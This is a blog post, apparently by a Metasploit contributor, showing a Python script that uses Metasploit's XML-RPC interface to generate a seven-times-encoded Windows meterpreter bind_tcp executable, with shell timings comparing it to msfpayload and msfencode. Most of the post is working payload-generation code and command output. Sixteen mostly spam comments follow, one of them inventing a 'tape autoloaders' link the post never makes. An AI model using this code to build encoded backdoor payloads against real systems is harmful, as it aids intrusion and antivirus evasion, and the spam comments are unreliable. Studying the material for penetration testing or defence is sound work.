I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.
import xmlrpclib
import binascii
proxy = xmlrpclib.ServerProxy("http://localhost:55553")
ret = proxy.auth.login("msf","abc123")
if ret['result'] == 'success':
token = ret['token']
else:
print "Could not login\n"
opts = {
"Format" : 'exe',
"Iterations" : 7,
"ForceEncode" : True}
ret = proxy.module.execute(token,"payload","windows/meterpreter/bind_tcp",opts)
if(ret['result'] == 'success'):
print binascii.unhexlify(ret['payload'])
Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:
root@bt:~/msfmods/py# time (python get_payload.py > /tmp/test3)
real 0m3.839s
user 0m0.020s
sys 0m0.043s
root@bt:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )
real 0m10.548s
user 0m7.553s
sys 0m2.920s
root@bt:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.
Have thoughts or suggestions ?
Hit me up at sussurro [aT] happypacket DOT net
16 comments:
it awesome artical.i found it so educational.
I think, my friend has shared this post by mistake because I asked him to find someone who can Do My Dissertation Uk
format and I do not know why he has shared this post with me but I must say, you have posted very nice information which can be beneficial for many students.
My last week was spent learning how to generate payloads inside Metasploit, but still, I had some questions, and I was looking for their answers. After reading your blog, I identified an error that caused me to fail. British Writings
Being a blog writer is tough you have to be genuine about everything because your fans believe you blindly. This is a lot of pressure. I follow a blogger and she posts reviews about academic online services. I recently took this Marketing thesis help on her recommendation and believe me it turned out to be the best decision. Your authenticity is what gets you, followers!
it awesome artical.i found it so educational. and every ones know that your writing style its adorable i am designer i have best collection of shearling leather jackets for men in USA
Leather Jackets for men are a great way to add a touch of style to your look and they can also keep you warm in cooler weather.
it awesome artical.i found it so educational. and every ones know that your writing style its adorable by the way i am agent in save driver company we provide best dubai safe driver.
I think it's a great idea! I would love to be able to pay for grades in online class. It would incentive me to do my best and get good grades.
I think it's a fantastic plan! I love reading your article keep up with the good work. It is such an amazing blog. Take my hesi exam for me
I found your post on "Fun with Metasploit payload generation" quite interesting. However, as a healthcare enthusiast, I would like to suggest that your readers check out Meri Sehat.pk - an online healthcare services provider that offers a variety of services, including an online BP check app. This app is very helpful for people who want to monitor their blood pressure at home and keep track of their health. It's always great to see technology being used for the betterment of our health, and I believe Meri Sehat.pk is doing a fantastic job in that regard.
I have read your post but I can't understand to your post, I was busy with cheap dissertation writing services
The App Design and Development Company is a game-changer. Their seamless blend of stunning design and robust development creates user-centric apps that captivate audiences and deliver exceptional experiences. Truly impressive!
Presents an exciting opportunity to explore the world of Metasploit payload generation. This resource offers hands-on experiences for cybersecurity enthusiasts looking to expand their knowledge in ethical hacking. When faced with academic challenges, reliable services can assist in achieving academic success by providing expert guidance and support with assignments.
Source: write my assignment for me
That is additionally a very good article that I absolutely loved reading. It is not every day that I am getting to look at something like this. joy lenz snowed inn christmas coat Desire you may have many extra top articles to share with us.
Moreover, I found the connection you made to "tape autoloaders" intriguing. While it might seem like an unusual pairing, the integration of Metasploit's payload generation capabilities with tape autoloaders presents an innovative perspective. It's a reminder that cybersecurity is a constantly evolving field, and creative thinking is vital to staying ahead of potential threats.
Post a Comment